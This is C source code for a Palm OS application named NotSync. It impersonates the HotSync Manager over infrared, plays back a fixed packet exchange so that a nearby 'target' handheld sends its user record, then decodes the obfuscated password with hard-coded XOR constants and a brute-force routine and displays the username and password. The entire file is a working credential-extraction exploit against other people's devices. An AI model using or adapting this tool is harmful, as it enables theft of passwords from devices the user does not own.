#include <PalmOS.h>
#include <SerialMgr.h>
#include <SerialMgrOld.h>
#include <SerialLinkMgr.h>
#include <SystemResources.h>
#include "notsync_res.h"

/***************************************************************
 * Constants
 ***************************************************************/

#define version30	0x03003000		// PalmOS 3.0 version number
#define abort(msg)	ErrDisplayFileLineMsg(__FILE__, __LINE__, msg)

#define pwdLength	32
#define maxBodySize 256 // really should be 0xFFFF

/***************************************************************
 * Global variables
 ***************************************************************/

MenuBarPtr		CurrentMenu = NULL; // Pointer to current menu

// HotSync Manager 

UInt16 portID;
UInt16 socket;

SlkPktHeaderType sendHdr, rcvHdr; 	// serial link packet header
SlkWriteDataType writeList[2]; 		// serial link write data segments
UInt8 rcvBody[maxBodySize];
Boolean connected = 0;

typedef struct PilotUser {
  UInt8 header[4];
  UInt8 exec_buf[6];
  Int32 userID; // 0
  Int32 viewerID; // 4
  Int32 lastSyncPC; // 8
  UInt8 successfulSyncDate[8]; // 12, time_t
  UInt8 lastSyncDate[8]; // 20, time_t
  UInt8 userLen; // 28
  UInt8 passwordLen; // 29
  UInt8 username[128]; // 30 -> userLen
  UInt8 password[32];
} PILOTUSER;

UInt8 body0[]  = {0x01, 0xC0, 0x00, 0x0A, 0x01, 0x00, 0x01};
UInt8 body1[]  = {0x02, 0xC0, 0x00, 0x0A};
UInt8 body2[]  = {0x01, 0xC0, 0x00, 0x0A, 0x02, 0x80, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x25, 0x80};
UInt8 body3[]  = {0x01, 0xC0, 0x00, 0x08, 0x12, 0x01, 0x20, 0x04, 0x00, 0x01, 0x00, 0x02};
UInt8 body4[]  = {0x02, 0xC0, 0x00, 0x22};
UInt8 body5[]  = {0x01, 0xC0, 0x00, 0x0E, 0x39, 0x01, 0x22, 0x0A, 0x00, 0x80, 0x68, 0x74, 0x61, 0x6C, 0x68, 0x74, 0x63, 0x70};
UInt8 body6[]  = {0x02, 0xC0, 0x00, 0x04};
UInt8 body7[]  = {0x01, 0xC0, 0x00, 0x0A, 0x38, 0x01, 0x20, 0x06, 0x6E, 0x65, 0x74, 0x6C, 0x00, 0x00};
UInt8 body8[]  = {0x02, 0xC0, 0x00, 0x0A};
UInt8 body9[]  = {0x01, 0xC0, 0x00, 0x02, 0x36, 0x00};
UInt8 body10[] = {0x02, 0xC0, 0x00, 0x1E};
UInt8 body11[] = {0x01, 0xC0, 0x00, 0x02, 0x10, 0x00};

// Password Decoding

typedef unsigned char p_block[pwdLength];

unsigned char constantShort[] = {0x09, 0x02, 0x13, 0x45, 0x07, 0x04, 0x13, 0x44, 
								 0x0C, 0x08, 0x13, 0x5A, 0x32, 0x15, 0x13, 0x5D, 
								 0xD2, 0x17, 0xEA, 0xD3, 0xB5, 0xDF, 0x55, 0x63, 
								 0x22, 0xE9, 0xA1, 0x4A, 0x99, 0x4B, 0x0F, 0x88};
unsigned char constantLong[]  = {0xB1, 0x56, 0x35, 0x1A, 0x9C, 0x98, 0x80, 0x84, 
								 0x37, 0xA7, 0x3D, 0x61, 0x7F, 0x2E, 0xE8, 0x76, 
								 0x2A, 0xF2, 0xA5, 0x84, 0x07, 0xC7, 0xEC, 0x27, 
								 0x6F, 0x7D, 0x04, 0xCD, 0x52, 0x1E, 0xCD, 0x5B, 
								 0xB3, 0x29, 0x76, 0x66, 0xD9, 0x5E, 0x4B, 0xCA, 
								 0x63, 0x72, 0x6F, 0xD2, 0xFD, 0x25, 0xE6, 0x7B, 
								 0xC5, 0x66, 0xB3, 0xD3, 0x45, 0x9A, 0xAF, 0xDA, 
								 0x29, 0x86, 0x22, 0x6E, 0xB8, 0x03, 0x62, 0xBC};
								 
typedef struct __passlist {
	p_block pass;
	struct __passlist *next;
} PASSLIST;

/***************************************************************
 * Prototypes for internal functions
 ***************************************************************/

void SetFldText (FieldPtr fld, const char *string);
void* GetObjectPtr (UInt16 objectID);
void HotSyncManager (PILOTUSER *pu);
UInt16 StartApplication (void);
void StopApplication (void);
void MainDoMenuCommand (UInt16 command);
Boolean ApplicationHandleEvent (EventPtr event);
void EventLoop (void);
Err RomVersionCompatible (UInt32 requiredVersion, UInt16 launchFlags);
Boolean MainFormHandleEvent (EventPtr event);
UInt16 Decode (UInt8 *argv);
void free_passlist (PASSLIST *pl);
int decode_long (PASSLIST **pListHead, p_block pass, unsigned char j);
void SetCurrentMenu(UInt16 rscID);

/***********************************************************************
 * SetFldText
 *
 * Changes the contents of a specified field with the passed string
 ***********************************************************************/

void SetFldText (FieldPtr fld, const char *string)
{
	MemHandle 	textH;
	char 		*textP;

	textH = MemHandleNew (StrLen(string)+1);
					
	if (textH) 
	{
		textP=MemHandleLock(textH);
		StrCopy(textP, string);
		FldSetTextHandle(fld, textH);
		MemHandleUnlock(textH);
		FldDrawField(fld);
		FldFreeMemory(fld); // Clears insertion point
	}
}

/***********************************************************************
 *
 * FUNCTION:    GetObjectPtr
 *
 * DESCRIPTION: This routine returns a pointer to an object in the current
 *              form.
 *
 * PARAMETERS:  formId - id of the form to display
 *
 * RETURNED:    nothing
 *
 ***********************************************************************/

void* GetObjectPtr (UInt16 objectID)
{
	FormPtr frm;
	
	frm = FrmGetActiveForm ();
	return (FrmGetObjectPtr (frm, FrmGetObjectIndex (frm, objectID)));

}

/***********************************************************************
 *
 * FUNCTION:    HotSyncManager
 *
 * DESCRIPTION: Acts as the HotSync Manager and negotiates with Palm 
 * device until the PilotUser struct is received, which contains the 
 * user name and encoded password string
 *
 * PARAMETERS:  pointer to PilotUser struct
 *
 * RETURNED:    nothing
 *
 ***********************************************************************/

void HotSyncManager (PILOTUSER *pu)
{
	// Compose the packet header
	sendHdr.dest = slkSocketDLP;
	sendHdr.src = slkSocketDLP;
	sendHdr.type = slkPktTypePAD;
	
	// HSM checks current baud rate (IOCTL_SERIAL_GET_PROPERTIES) and sends to Palm (should be 9600bps)
	writeList[0].size = sizeof(body2);
	writeList[0].dataP = body2;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	
	// ACK from Palm
	SlkFlushSocket (socket, 0);
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x0A}

	// Connecting with Handheld
	writeList[0].size = sizeof(body3);
	writeList[0].dataP = body3;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	
	// ACK from Palm
	SlkFlushSocket (socket, 0);	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x08}
	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x22, 0x92, 0x02, 0x00, 0x00, 0x20, 0x0E, 0x03, 0x30, 0x30, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x21, 0x0C, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE1}
	
	sendHdr.transId = rcvHdr.transId; // For ACK, Transaction ID needs to be the same as the HSM specified 
	writeList[0].size = sizeof(body4);
	writeList[0].dataP = body4;	
	writeList[1].size = 0;
	SlkSendPacket (&sendHdr, writeList); // ACK
	
	writeList[0].size = sizeof(body5);
	writeList[0].dataP = body5;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	
	// ACK from Palm	
	SlkFlushSocket (socket, 0);
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x0E}
	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x04, 0xB9, 0x00, 0x00, 0x00}

	sendHdr.transId = rcvHdr.transId; // For ACK, Transaction ID needs to be the same as the HSM specified 
	writeList[0].size = sizeof(body6);
	writeList[0].dataP = body6;	
	writeList[1].size = 0;
	SlkSendPacket (&sendHdr, writeList); // ACK
	
	writeList[0].size = sizeof(body7);
	writeList[0].dataP = body7;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	 
	// ACK from Palm	
	SlkFlushSocket (socket, 0);
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x0A}
	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x0A, 0xB8, 0x01, 0x00, 0x00, 0x20, 0x04, 0x03, 0x20, 0x00, 0x00}

	sendHdr.transId = rcvHdr.transId; // For ACK, Transaction ID needs to be the same as the HSM specified 
	writeList[0].size = sizeof(body8);
	writeList[0].dataP = body8;	
	writeList[1].size = 0;
	SlkSendPacket (&sendHdr, writeList); // ACK

	writeList[0].size = sizeof(body9);
	writeList[0].dataP = body9;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	
	// ACK from Palm	
	SlkFlushSocket (socket, 0);
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x02}
	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x1E, 0xB6, 0x01, 0x00, 0x00, 0x20, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}

	sendHdr.transId = rcvHdr.transId; // For ACK, Transaction ID needs to be the same as the HSM specified 
	writeList[0].size = sizeof(body10);
	writeList[0].dataP = body10;	
	writeList[1].size = 0;
	SlkSendPacket (&sendHdr, writeList); // ACK

	writeList[0].size = sizeof(body11);
	writeList[0].dataP = body11;	
	writeList[1].size = 0;
	sendHdr.transId = 0;
	SlkSendPacket (&sendHdr, writeList);
	
	// ACK from Palm	
	SlkFlushSocket (socket, 0);
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x02, 0xC0, 0x00, 0x02}

	// Receive PilotUser struct from Palm	
	SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x4C, ...}

	SlkCloseSocket (socket);
	
	// close serial link manager
	SlkClose();
	SrmClose(portID);

	// Fill in PilotUser struct
	MemMove (pu, rcvBody, 40);
	MemMove (pu->username, rcvBody+40, pu->userLen);
	MemMove (pu->password, rcvBody+40+pu->userLen, pu->passwordLen);
}
 
/***********************************************************************
 *
 * FUNCTION:     StartApplication
 *
 * DESCRIPTION:  This routine opens the application's database, loads the 
 *               saved-state information and initializes global variables.
 *
 * PARAMETERS:   nothing
 *
 * RETURNED:     nothing
 *
 ************************************************************************/

UInt16 StartApplication (void)
{ 
	Err err;
	UInt32 value;
	
	// PalmOS 3.3 and greater
	err = FtrGet(sysFileCSerialMgr, sysFtrNewSerialPresent, &value);
	if (err || !value) abort ("error trying to locate serial manager.");
	
	//err = SrmOpen(serPortLocalHotSync, 9600, &portID);
	err = SrmOpen(sysFileCVirtIrComm, 9600, &portID);
	if (err) abort ("error trying to open serial manager.");

	// attempt to open serial link manager
	err = SlkOpen();
	if (err != 0 && err != slkErrAlreadyOpen) abort("error trying to open serial link manager.");
		
	socket = slkSocketDLP;
	err = SlkOpenSocket (portID, &socket, true);
	if (err) abort ("error trying to open socket.");
	
	return 0;
}

/***********************************************************************
 *
 * FUNCTION:    StopApplication
 *
 * DESCRIPTION: This routine closes the application's database
 *              and saves the current state of the application.
 *
 * PARAMETERS:  nothing
 *
 * RETURNED:    nothing
 *
 ***********************************************************************/
 
void StopApplication (void)
{	
	// Close socket and Serial Link Manager in case it was left open
	SlkCloseSocket (socket);
	SlkClose();
	SrmClose(portID);
}

/***********************************************************************
 *
 * FUNCTION:    MainDoMenuCommand
 *
 * DESCRIPTION: P4. This routine performs the menu command specified.
 *
 * PARAMETERS:  command  - menu item id
 *
 * RETURNED:    nothing
 *
 ***********************************************************************/

void MainDoMenuCommand (UInt16 command)
{
	FormPtr		frmP;
		
	// Do the appropriate action for the menu command selected.
	switch (command)
	{
		case OptionsAboutNotSync:
			// Load the about form, then display it.
			frmP = FrmInitForm(AboutForm);
			FrmDoDialog(frmP);
				
			// Delete the info form.
	 		FrmDeleteForm(frmP);
	 		break;
	}
}

/***************************************************************
 * ApplicationHandleEvent
 ***************************************************************/
 
Boolean ApplicationHandleEvent (EventPtr event)
{
	FormPtr	frm;
	UInt16	formId;
	Boolean	handled=false;
	
	// check for a form load event
	if (event->eType==frmLoadEvent)
	{
		// load the form resource specified in the event then activate the form.
		formId=event->data.frmLoad.formID;
		frm=FrmInitForm(formId);
		FrmSetActiveForm(frm);
		
		// if so, load the appropriate form event handler
		// set the event handler for the form.  The handler of the currently 
		// active form is called by FrmDispatchEvent each time it receives an event.
		switch (formId)
		{
			case MainForm:
				FrmSetEventHandler(frm, MainFormHandleEvent);
				break;
		}
		
		handled=true;
	}
	
	return handled;
}

/***************************************************************
 * EventLoop
 ***************************************************************/
 
void EventLoop (void)
{
	EventType 	event;
	UInt16		error;
	
	do
		{
		// Get the next available event.
		EvtGetEvent(&event, sysTicksPerSecond/10); // Post a nilEvent
		
		// Give the system a chance to handle the event.
		if (! SysHandleEvent(&event))

			// P2. Give the menu bar a chance to update and handle the event.	
			if (! MenuHandleEvent(CurrentMenu, &event, &error))

				// P3. Give the application a chance to handle the event.
				if (! ApplicationHandleEvent(&event))

					// P3. Let the form object provide default handling of the event.
					FrmDispatchEvent(&event);
	}	
	
	while (event.eType != appStopEvent);
}

/***************************************************************
 * PilotMain
 ***************************************************************/
 
UInt32 PilotMain(UInt16 cmd, MemPtr cmdPBP, UInt16 launchFlags)
{
	UInt16 error;		// P4. error starting the app
	
	// P4. This app makes use of PalmOS 3.0 features.  It will crash if
	// run on an earlier version of PalmOS.  Detect and warn if this happens,
	// then exit.
	error = RomVersionCompatible (version30, launchFlags);
	if (error)
		return error;
		
	// Check launch code sent by the app launcher
	switch (cmd)
	{
		case sysAppLaunchCmdNormalLaunch:
			error = StartApplication ();
			if (error) return (error);

			FrmGotoForm(MainForm);
			EventLoop();
			StopApplication();
			break;
	}
	
	return 0;
}	

/***********************************************************************
 *
 * FUNCTION:    RomVersionCompatible
 *
 * DESCRIPTION: P4. Check that the ROM version meets your
 *              minimum requirement.  Warn if the app was switched to.
 *
 * PARAMETERS:  requiredVersion - minimum rom version required
 *                                (see sysFtrNumROMVersion in SystemMgr.h 
 *                                for format)
 *              launchFlags     - flags indicating how the application was
 *											 launched.  A warning is displayed only if
 *                                these flags indicate that the app is 
 *											 launched normally.
 *
 * RETURNED:    zero if rom is compatible else an error code
 *                             
 ***********************************************************************/

Err RomVersionCompatible (UInt32 requiredVersion, UInt16 launchFlags)
{
	UInt32 romVersion;
	
	// See if we're on in minimum required version of the ROM or later.
	// The system records the version number in a feature.  A feature is a
	// piece of information which can be looked up by a creator and feature
	// number.
	FtrGet(sysFtrCreator, sysFtrNumROMVersion, &romVersion);
	if (romVersion < requiredVersion)
		{
		// If the user launched the app from the launcher, explain
		// why the app shouldn't run.  If the app was contacted for something
		// else, like it was asked to find a string by the system find, then
		// don't bother the user with a warning dialog.  These flags tell how
		// the app was launched to decided if a warning should be displayed.
		if ((launchFlags & (sysAppLaunchFlagNewGlobals | sysAppLaunchFlagUIApp)) ==
			(sysAppLaunchFlagNewGlobals | sysAppLaunchFlagUIApp))
			{
			FrmAlert (RomIncompatibleAlert);
		
			// Pilot 1.0 will continuously relaunch this app unless we switch to 
			// another safe one.  The sysFileCDefaultApp is considered "safe".
			if (romVersion < 0x02000000)
				AppLaunchWithCommand(sysFileCDefaultApp, sysAppLaunchCmdNormalLaunch, NULL);
			}
		
		return (sysErrRomIncompatible);
		}

	return 0;
}

/***************************************************************
 * MainFormHandleEvent
 ***************************************************************/
 
Boolean MainFormHandleEvent (EventPtr event)
{
	Boolean		handled=false;
	FormPtr 	frm;
	PILOTUSER	pu;
	
	switch (event->eType)
	{
		case frmOpenEvent: // The form was told to open.
			SetCurrentMenu(MainMenuBar); // P2. set the current menu to the main menu
			frm = FrmGetActiveForm ();
			FrmDrawForm (frm);
			
			handled=true;
			break;
		
		case menuEvent:		// A menu item was selected.
			// First clear the menu status from the display.
			MenuEraseStatus(CurrentMenu);
			
			// process menu commands
			MainDoMenuCommand(event->data.menu.itemID);
			handled = true;
			break;
			
		case nilEvent:
			// Wait for HotSync procedure to be initiated
			if (!connected)
			{
				if(MemCmp(rcvBody, body0, sizeof(body0)) != 0)
				{
					SetFldText(GetObjectPtr(MainStatusField), "Waiting to connect with target");
					SlkFlushSocket (socket, 0);
					SlkReceivePacket (socket, true, &rcvHdr, rcvBody, maxBodySize, sysTicksPerSecond); // {0x01, 0xC0, 0x00, 0x0A, 0x01, 0x00, 0x01, ...}
				}
				else
				{
					connected = true;
					SetFldText(GetObjectPtr(MainStatusField), "Identifying user");
						
					frm = FrmGetActiveForm();
					FrmHideObject (frm, FrmGetObjectIndex(frm, MainNotIdentifyBitMap));
					FrmShowObject (frm, FrmGetObjectIndex(frm, MainIdentifyBitMap));
		
					// Compose the packet header
					sendHdr.dest = slkSocketDLP;
					sendHdr.src = slkSocketDLP;
					sendHdr.type = slkPktTypePAD;
					sendHdr.transId = rcvHdr.transId; // For ACK, Transaction ID needs to be the same as the HSM specified 
			
					// Specify packet body
					writeList[0].size = sizeof(body1);
					writeList[0].dataP = body1;	
					writeList[1].size = 0;
					SlkSendPacket (&sendHdr, writeList); // ACK

					HotSyncManager(&pu); // Start HotSync negotiations to get username and encoded password
					SetFldText(GetObjectPtr(MainUsernameField), (const char*)pu.username);
					
					SetFldText(GetObjectPtr(MainStatusField), "Decoding password block");
					FrmHideObject (frm, FrmGetObjectIndex(frm, MainNotSyncBitMap));
					FrmShowObject (frm, FrmGetObjectIndex(frm, MainSyncBitMap));
									
					if (pu.passwordLen == 0x00)
						SetFldText(GetObjectPtr(MainStatusField), "Password: <none>");
					else
						Decode (pu.password);
				}
			}
			
			handled = true;
			break;
	}
	
	return (handled);
}

UInt16 Decode (UInt8 *argv)
{
	unsigned char temp;
	int i, j;
	p_block pass;
	PASSLIST *newpl,*oldpl,*entry;
	char tmpstring[80];

	for (j = 0; j < pwdLength; ++j) // prevent an endless loop if bytes do not match
	{
		if (MemCmp(&argv[4], &constantShort[4], 28) != 0)
		{
			// rotate constant block by 1 byte
			temp = constantShort[0];
			for (i = 1; i < pwdLength; ++i)
				constantShort[i - 1] = constantShort[i]; 
			constantShort[pwdLength - 1] = temp;
		}
	}

	// short password
	if (MemCmp(&argv[4], &constantShort[4], 28) == 0) // password is 4 chars or less
	{
		pass[0] = argv[0] ^ constantShort[0];
		pass[1] = argv[1] ^ constantShort[1];
		pass[2] = argv[2] ^ constantShort[2];
		pass[3] = argv[3] ^ constantShort[3];
		pass[4] = argv[4] ^ constantShort[4]; // 0x00

		StrCopy(tmpstring, "Password: ");
		StrCat(tmpstring, (const char*)pass);		
		SetFldText(GetObjectPtr(MainStatusField), tmpstring);
		return 0;
	}

	// long password, output feedback w/ no key
	newpl = NULL;
	oldpl = NULL;

	// Pass 1
	decode_long (&newpl, argv, 8);
	oldpl = newpl;
	newpl = NULL;

	// Pass 2
	entry = oldpl;
	while (entry != NULL) {
		decode_long (&newpl, entry->pass, 24);
		entry = entry->next;
	}
	free_passlist (oldpl);
	oldpl = newpl;
	newpl = NULL;
	
	// Pass 3	
	entry = oldpl;
	while (entry != NULL) {
		decode_long (&newpl, entry->pass, 16);
		entry = entry->next;
	}
	free_passlist (oldpl);
	oldpl = newpl;
	newpl = NULL;

	// Pass 4
	entry = oldpl;
	while (entry != NULL) {
		decode_long (&newpl, entry->pass, 2);
		entry = entry->next;
	}
	free_passlist (oldpl);
	oldpl = newpl;
	newpl = NULL;

	// Test each entry in oldpl
	while (oldpl != NULL) {
		for (i = 5; i < pwdLength; ++i) // pass is greater than 4 chars
		{
			for (j = 0; j + i < pwdLength; ++j)
			{

				if ((oldpl->pass[j+i] - i) != oldpl->pass[j]) 
					break;

				if (j + i == pwdLength - 1) { // Done comparing?
					// Success
					StrNCopy ((Char *)pass, (Char*)oldpl->pass, i);
					pass[i] = 0x00; 
					
					StrCopy(tmpstring, "Password: ");
					StrCat(tmpstring, (const char*)pass);		
					SetFldText(GetObjectPtr(MainStatusField), tmpstring);
					return 0;
				}
			}
		}

		oldpl = oldpl->next;
	}

	free_passlist(oldpl);
	return 0;
}

int decode_long (PASSLIST **pListHead, p_block pass, unsigned char j)
{
	int i;
	unsigned char index, shift, j_temp, index_temp;
	unsigned short temp;
	p_block pass_temp;

	// 512 possible values for temp
	for (index = 0; index < 64; ++index)
	{
		for (shift = 0; shift < 8; ++shift)
		{
			MemMove (pass_temp, pass, pwdLength);
			j_temp = j;
			index_temp = index;

			for (i = 0; i < pwdLength; ++i)
			{
				if (j_temp == pwdLength) j_temp = 0; // wrap around to beginning
				if (index_temp == 64) index_temp = 0; // wrap around to beginning

				temp = constantLong[index_temp]; // xy
				temp <<= 8;
				temp |= constantLong[index_temp]; // xyxy

				temp >>= shift;

				pass_temp[j_temp] ^= (unsigned char) temp;
				++j_temp;
				++index_temp;
			}

			if ((index == ((pass_temp[j] + pass_temp[j+1]) & 0x3F)) &&
			    (shift == ((pass_temp[j+2] + pass_temp[j+3]) & 0x7)))
			{
				// Success!
				PASSLIST *entry = (PASSLIST *) MemPtrNew(sizeof(PASSLIST));
				MemMove (&(entry->pass), pass_temp, pwdLength);
				entry->next = *pListHead;
				*pListHead = entry;
			}
		}
	}

	return 0;
}

void free_passlist (PASSLIST *pl)
{
	PASSLIST *next;

	while (pl != NULL) {
		next = pl->next;
		MemChunkFree (pl);
		pl = next;
	}
}

/***********************************************************************
 *
 * FUNCTION:    SetCurrentMenu
 *
 * DESCRIPTION: P2. This routine loads the specified menu resource and makes
 *              it the current menu.  
 *
 * PARAMETERS:  rscID  - resource id of the new menu
 *
 * RETURNED:    nothing
 *
 ***********************************************************************/

void SetCurrentMenu(UInt16 rscID)
{
	// Dispose of an existing current menu.
	if (CurrentMenu)
		MenuDispose(CurrentMenu);
	
	// Set the current menu and remember it.
	CurrentMenu = MenuInit(rscID);
}
